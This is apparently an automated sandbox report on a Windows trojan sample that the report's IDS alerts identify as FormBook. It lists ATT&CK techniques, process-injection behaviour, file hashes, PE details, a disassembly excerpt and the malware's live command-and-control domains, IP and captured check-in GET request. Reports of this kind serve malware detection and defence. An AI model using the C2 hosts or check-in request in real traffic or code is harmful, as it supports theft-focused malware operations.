| Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Virtualization/Sandbox Evasion | 1 Input Capture | 251 Security Software Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 612 Process Injection | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 113 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
Behavior Graph ID: 635151 | Sample: lamsddre43321.exe | Startdate: 27/05/2022 | Architecture: WINDOWS | Score: 100

Start
  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
  lamsddre43321.exe (19) started
    File dropped: C:\Users\user\AppData\Local\Temp\rlpjf.exe, PE32
    rlpjf.exe started
      Signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
      rlpjf.exe started
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        msiexec.exe started
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
          cmd.exe (1) started
            conhost.exe started
        explorer.exe injected
          DNS/IP: www.nzyyen.com 154.221.90.236, 49759, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles; www.higginsuotdoors.com; 2 other IPs or domains
          Signatures: System process connects to network (likely due to code injection or exploit)

| Source | Detection | Scanner | Label |
|---|---|---|---|
| lamsddre43321.exe | 43% | Virustotal | |
| lamsddre43321.exe | 39% | ReversingLabs | Win32.Trojan.Injexa |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\rlpjf.exe | 37% | ReversingLabs | Win32.Trojan.Jaik |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 2.0.rlpjf.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 2.2.rlpjf.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 2.0.rlpjf.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 2.0.rlpjf.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 1.2.rlpjf.exe.f70000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| www.higginsuotdoors.com | 0% | Virustotal | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| www.rebelmvmt.com/t23s/ | 4% | Virustotal | |
| www.rebelmvmt.com/t23s/ | 100% | Avira URL Cloud | malware |
| https://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3X | 0% | Avira URL Cloud | safe |
| http://www.nzyyen.com/t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ | 100% | Avira URL Cloud | malware |
| http://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.nzyyen.com | 154.221.90.236 | true | true | | unknown |
| website-rendering.jouwweb.nl | 35.204.150.5 | true | false | | high |
| www.higginsuotdoors.com | unknown | unknown | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| www.rebelmvmt.com/t23s/ | true | 4%, Virustotal; Avira URL Cloud: malware | low |
| http://www.nzyyen.com/t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ | true | Avira URL Cloud: malware | unknown |
| http://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ | false | Avira URL Cloud: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3X | msiexec.exe, 0000000F.00000002.541916856.00000000059BF000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 154.221.90.236 | www.nzyyen.com | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true |
| 35.204.150.5 | website-rendering.jouwweb.nl | United States | 15169 | GOOGLEUS | false |
              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:635151
              Start date and time: 27/05/202215:54:112022-05-27 15:54:11 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 10m 1s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:lamsddre43321.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:30
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@10/4@2/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 69.5% (good quality ratio 63.9%)
              • Quality average: 73.5%
              • Quality standard deviation: 31.3%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Adjust boot time
              • Enable AMSI
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
              No simulations
              No context
              Process:C:\Users\user\Desktop\lamsddre43321.exe
              File Type:data
              Category:dropped
              Size (bytes):335303
              Entropy (8bit):7.522231151776849
              Encrypted:false
              SSDEEP:6144:QcS87ZW3O8lg0/tMBZmbZ+zpvncW/sSGg:9jqgi6ZmUcW/sS
              MD5:800972B7F755FD89A742BF3953AB5889
              SHA1:708375BDFF9C6250EE4CE95659230BD7C2249114
              SHA-256:0B7D7E2F43697DF29548A389E94CAB868E41D3D68B1630985334B8F5B0843B4E
              SHA-512:3A91EDDB6571522B91C26EC94AFFACB31FD0B50C611A558FB6E7DBCD46A56E491ABC752865832BA07C456D6FECB69C7EDA9D4BA9900C7FB9E576597B7686257F
              Malicious:false
              Reputation:low
              Preview:........,...................R...............................................................................................................................................................................................................................................................B...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\lamsddre43321.exe
              File Type:data
              Category:dropped
              Size (bytes):5083
              Entropy (8bit):6.145719793996354
              Encrypted:false
              SSDEEP:96:lUdu9pigKyb0mZBbCa8b6SeNK5pLzej2lCrCVhWt7dKYN7d+t:7HhRb0mrCZb6SaK5pXej2lCrCVhGJKYS
              MD5:EA71823F325F2B7CBCB947DA55ADD72D
              SHA1:EA3B50837539A67326169C6DBAF73A98D142307C
              SHA-256:B7C4A59BF353D515F295B2934D3E51D391F5BFEC036275CA709A22C8AC3C4E3A
              SHA-512:8AC9072989E91E6C6147BA4E26453392774195273059DA88A55F435B9A7AFDA94C70AB5A1B2FB3FCBDB7610A158B9E7197F26F6B0A4B5086CC5AD1ECDBA89065
              Malicious:false
              Reputation:low
              Preview:.DPHH........%.HK.."KW..K.."KW...%.H...pHHH.%.H.5L.5X......HHH.......5L.5X......HHH.......5L.5X......HHH.......5L.5X......HHH.......=XD2~.P /.GG.L.........X.Dw..............D.w..X!.....G...D.......%....w.HHHH.DdE.o%..5.!.5...5.. .5..!.5...5...4X#..L.#....h.I5..5.....PKE...G%..HHHH..dDgHHH.DdM..%...........LH....K.."KW....P.H..L7h..P.H..X.T....D........P.H...P.I........LH0R..;.6FHH.0FHH.TH0"..;.(FHH..FHH.PH0M..;..FHH..FHH.PH...pK.."KW.....XHHH.......=.H4R....HH..................EHH.4...P..P!/.H..M...M......P!..H..M...M..F.P /.H..E..0"..;..IHH..........K.....5P.........=.H4B.%.H.C...IHHH.....DH....K.."KW.....pHHH.......=.H4R....HH..................DHH.K..HHH..P..P!/.H..M...M...L..P!..H..M...M...X..P!....M...M...Tw..P./.G..U...U......P!..F..M...M..E.P /.H..E..0R..;..HHH..........=`H4P.....`.I.S.5`.5T.5X.5L.5P.........=.H4B.%.H.C...IHHH.....TH...\...XHHH.......=.H4R....HH..................GHH.4...P..P!/.H..M...M...L..P!..H..M...M..F.P /.H..E..0M..;.eHHH..l.......J.5L.5P..
              Process:C:\Users\user\Desktop\lamsddre43321.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):134144
              Entropy (8bit):6.412192893603871
              Encrypted:false
              SSDEEP:1536:KCTOG+x8+YaGDARvmJVBqNvnlajcCOO0LdXU8JiA1OyDJ6zqjzswa+98qSIJnXSC:ufbnR6BqNvncvhwaz2swteq4iG5slD
              MD5:FB06AEE14DBF93907437AB4372B1BBDE
              SHA1:E29879A2398E6CC9C26D81AAD9FF714E8D69A9A1
              SHA-256:C27274F1B6814483746D398A5DDAB15CBAC70E3F7AE14DA4D834FCD34DAC7EDA
              SHA-512:48D409A4C64A9858FB7BC3B84DAE53CB92D63953B983D69C0E6087944B9A155207A24306D520DF090C8ECDDED4875ADAD2D7C9BFD9F8E3AA7037B0C0AB3A1AE1
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 37%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.}c{.}c{.}c{./.{.}c{./.{.}c{./.{.}c{(.bz.}c{.}b{.}c{y.gz.}c{y..{.}c{y.az.}c{Rich.}c{........................PE..L...u..b..........................................@..........................`............@..........................................@.......................P..........T...............................@............................................text...5........................... ..`.rdata..>N.......P..................@..@.data....1..........................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\lamsddre43321.exe
              File Type:data
              Category:dropped
              Size (bytes):189439
              Entropy (8bit):7.99132508951707
              Encrypted:true
              SSDEEP:3072:PTaHGxZSyXV9CwLp76J3O8jPRgtaDzWlTH3bwnfMByJH27mdtZPko8:vS87ZW3O8lg0/tMBZmbZU
              MD5:B306FC57D1FB9077FB2BF2BAD4CC39DD
              SHA1:480727033A7F1AEF1E5101CBB49FCEB49DB2F2AB
              SHA-256:A282B6CE83F9E19B1236F8181299E75033E408531C0390D8571840DA870EF4F4
              SHA-512:97E743B9C79EB7377EF12DE789479E52F74AB97C8960274487CBA0D7869F4B241C2F6DFB657C72F6D90026290C93730C47A1E5389FA33EDD49D7578C6CFD7461
              Malicious:false
              Reputation:low
              Preview:hN......Kv`U..}.hV3.<..g.@.m[..z.PPE...eR. .U.y.+.e!....D)....Ztx.V...x..4..\.x....*<.S....A...c.eu.M;.....v.@X.^...>.t....`..,..A.Oq..~.2....,...u..m....1b%.]....3....bO...@.....'..H\#..".2v?q..\,..(..;.#W%...m..6...dh....&Y...R.L...#.$.I?...._...V.....F~....?C.3..6....8...z..PE2..eRs .y.y.+.el....D).P..Z5..2.........>.+...-..I......../1.9..i,8.9..}.CV.. ....>.t....h%....\Mwj]/.f.`.........^....(1....=;...?)@6]O...@...../H\#.....qxKN!..(..;..W....H.sQ.P.dh....&9/>.RCL....#.$.I?....'...V......K~!.....?9.3...6....S...z.PPE...eR. .U.y.+.e!....D).P..Z5..2.........>.+...-..I......../1.9..i,8.9..}.CV.. ....>.t....h%....\Mwj]/.f.`.........^....(1....=;...?)@6]O...@.....'..H\#.."..p.qx.!..(..;..W....H..Q...dh....&9/>.RCL....#.$.I?....'...V......K~!.....?9.3...6....S...z.PPE...eR. .U.y.+.e!....D).P..Z5..2.........>.+...-..I......../1.9..i,8.9..}.CV.. ....>.t....h%....\Mwj]/.f.`.........^....(1....=;...?)@6]O...@.....'..H\#.."..p.qx.!..(..;..W....H..Q...dh....&
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.940776506304337
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:lamsddre43321.exe
              File size:278417
              MD5:b1fcf52deb6f04ef0f898c9938f26920
              SHA1:42d8b684ff7b293c0d8ad5de6f67d14d17c0b353
              SHA256:8535282c1740725ecf68a65e9ce582a5fe28db4ffcfcd07e6b1516d62cc9dc60
              SHA512:5b03a744b7642085c65091b7d68a2833c89cc0040246630e5714ff30cba7c19ae8c02611635d124b4e92532ff47d1020712773156723454c330cee4bc1c5a368
              SSDEEP:6144:B0Y1JrmXdnF2ThJWmbKKCaSZ+VhO3BmIVKi/oM:lJrmXBF2ThEKKKpSoO3Q2z1
              TLSH:544413003DC642BAEA9B183017EBB3EA29756320962763771B845F3EFD217DB9D050C9
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z.........
              Icon Hash:b2a88c96b2ca6a72
              Entrypoint:0x4032fa
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x4669CEB6 [Fri Jun 8 21:48:38 2007 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:55f3dfd13c0557d3e32bcbc604441dd3
              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409170h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push ebx
              call dword ptr [00407278h]
              mov dword ptr [00423FD4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F4E8h
              call dword ptr [00407154h]
              push 0040922Ch
              push 00423720h
              call 00007FF94D2938F8h
              call dword ptr [004070B4h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007FF94D2938E6h
              push ebx
              call dword ptr [00407108h]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423F20h], eax
              mov eax, edi
              jne 00007FF94D29115Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007FF94D2933D9h
              push eax
              call dword ptr [00407218h]
              mov dword ptr [esp+1Ch], eax
              jmp 00007FF94D2911B5h
              cmp cl, 00000020h
              jne 00007FF94D291158h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007FF94D29114Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [esp+14h], 00000020h
              jne 00007FF94D291158h
              inc eax
              mov byte ptr [esp+14h], 00000022h
              cmp byte ptr [eax], 0000002Fh
              jne 00007FF94D291185h
              inc eax
              cmp byte ptr [eax], 00000053h
              jne 00007FF94D291160h
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x288 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59ac | 0x5a00 | False | 0.668142361111 | data | 6.45807821776 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x117a | 0x1200 | False | 0.4453125 | data | 5.17513527374 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1afd8 | 0x400 | False | 0.6015625 | data | 4.98110806401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94448786242 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, CreateFileA, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CloseHandle, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/27/22-15:57:04.008947 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49759 | 80 | 192.168.2.3 | 154.221.90.236
05/27/22-15:57:04.008947 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49759 | 80 | 192.168.2.3 | 154.221.90.236
05/27/22-15:57:04.008947 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49759 | 80 | 192.168.2.3 | 154.221.90.236
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 15:57:03.806201935 CEST | 49759 | 80 | 192.168.2.3 | 154.221.90.236
May 27, 2022 15:57:04.008594990 CEST | 80 | 49759 | 154.221.90.236 | 192.168.2.3
May 27, 2022 15:57:04.008848906 CEST | 49759 | 80 | 192.168.2.3 | 154.221.90.236
May 27, 2022 15:57:04.008946896 CEST | 49759 | 80 | 192.168.2.3 | 154.221.90.236
May 27, 2022 15:57:04.208508015 CEST | 80 | 49759 | 154.221.90.236 | 192.168.2.3
May 27, 2022 15:57:04.208559990 CEST | 80 | 49759 | 154.221.90.236 | 192.168.2.3
May 27, 2022 15:57:04.208586931 CEST | 80 | 49759 | 154.221.90.236 | 192.168.2.3
May 27, 2022 15:57:04.208679914 CEST | 49759 | 80 | 192.168.2.3 | 154.221.90.236
May 27, 2022 15:57:04.208717108 CEST | 49759 | 80 | 192.168.2.3 | 154.221.90.236
May 27, 2022 15:57:04.208798885 CEST | 49759 | 80 | 192.168.2.3 | 154.221.90.236
May 27, 2022 15:57:04.402236938 CEST | 80 | 49759 | 154.221.90.236 | 192.168.2.3
May 27, 2022 15:57:26.550544977 CEST | 49775 | 80 | 192.168.2.3 | 35.204.150.5
May 27, 2022 15:57:26.577750921 CEST | 80 | 49775 | 35.204.150.5 | 192.168.2.3
May 27, 2022 15:57:26.577975035 CEST | 49775 | 80 | 192.168.2.3 | 35.204.150.5
May 27, 2022 15:57:26.578011036 CEST | 49775 | 80 | 192.168.2.3 | 35.204.150.5
May 27, 2022 15:57:26.608874083 CEST | 80 | 49775 | 35.204.150.5 | 192.168.2.3
May 27, 2022 15:57:26.608958960 CEST | 80 | 49775 | 35.204.150.5 | 192.168.2.3
May 27, 2022 15:57:26.609195948 CEST | 49775 | 80 | 192.168.2.3 | 35.204.150.5
May 27, 2022 15:57:26.609256983 CEST | 49775 | 80 | 192.168.2.3 | 35.204.150.5
May 27, 2022 15:57:27.062586069 CEST | 49775 | 80 | 192.168.2.3 | 35.204.150.5
May 27, 2022 15:57:27.089837074 CEST | 80 | 49775 | 35.204.150.5 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 15:57:03.630029917 CEST | 53802 | 53 | 192.168.2.3 | 8.8.8.8
May 27, 2022 15:57:03.800199986 CEST | 53 | 53802 | 8.8.8.8 | 192.168.2.3
May 27, 2022 15:57:26.475037098 CEST | 63146 | 53 | 192.168.2.3 | 8.8.8.8
May 27, 2022 15:57:26.549473047 CEST | 53 | 63146 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 15:57:03.630029917 CEST | 192.168.2.3 | 8.8.8.8 | 0x4c53 | Standard query (0) | www.nzyyen.com | A (IP address) | IN (0x0001)
May 27, 2022 15:57:26.475037098 CEST | 192.168.2.3 | 8.8.8.8 | 0x5b41 | Standard query (0) | www.higginsuotdoors.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 27, 2022 15:57:03.800199986 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c53 | No error (0) | www.nzyyen.com | | 154.221.90.236 | A (IP address) | IN (0x0001)
May 27, 2022 15:57:26.549473047 CEST | 8.8.8.8 | 192.168.2.3 | 0x5b41 | No error (0) | www.higginsuotdoors.com | website-rendering.webador.com | | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 15:57:26.549473047 CEST | 8.8.8.8 | 192.168.2.3 | 0x5b41 | No error (0) | website-rendering.webador.com | website-rendering.jouwweb.nl | | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 15:57:26.549473047 CEST | 8.8.8.8 | 192.168.2.3 | 0x5b41 | No error (0) | website-rendering.jouwweb.nl | | 35.204.150.5 | A (IP address) | IN (0x0001)
              • www.nzyyen.com
              • www.higginsuotdoors.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49759 | 154.221.90.236 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 27, 2022 15:57:04.008946896 CEST | 8284 | OUT | GET /t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ HTTP/1.1
              Host: www.nzyyen.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
May 27, 2022 15:57:04.208508015 CEST | 8285 | IN | HTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 27 May 2022 13:57:03 GMT
              Content-Type: text/html
              Content-Length: 1946
              Connection: close
              Vary: Accept-Encoding
